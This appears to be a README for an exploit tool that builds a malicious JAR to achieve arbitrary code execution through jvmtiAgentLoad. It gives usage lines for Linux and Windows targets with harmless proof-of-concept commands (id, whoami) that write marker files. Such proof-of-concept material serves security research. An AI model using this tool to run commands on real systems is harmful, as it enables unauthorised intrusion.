Awesome
Arbitrary code execution via jvmtiAgentLoad
Description:
Tools and code for generating a malicious JAR to exploit jvmtiAgentLoad
Usage:
$ bash create_jar.sh
Usage: create_jar.sh <TARGET_OS> <COMMAND>
Supported TARGET_OS options: linux|windows
Linux Target
The following command generates a JAR (mal.jar) that can be used on a Linux target:
bash create_jar.sh linux 'id > /tmp/jvmtiLoadAgent_test'
Windows Target
The following command generates a JAR (mal.jar) that can be used on a Windows target:
bash create_jar.sh windows 'whoami > C:\\Users\\Public\\jvmtiLoadAgent_test.txt'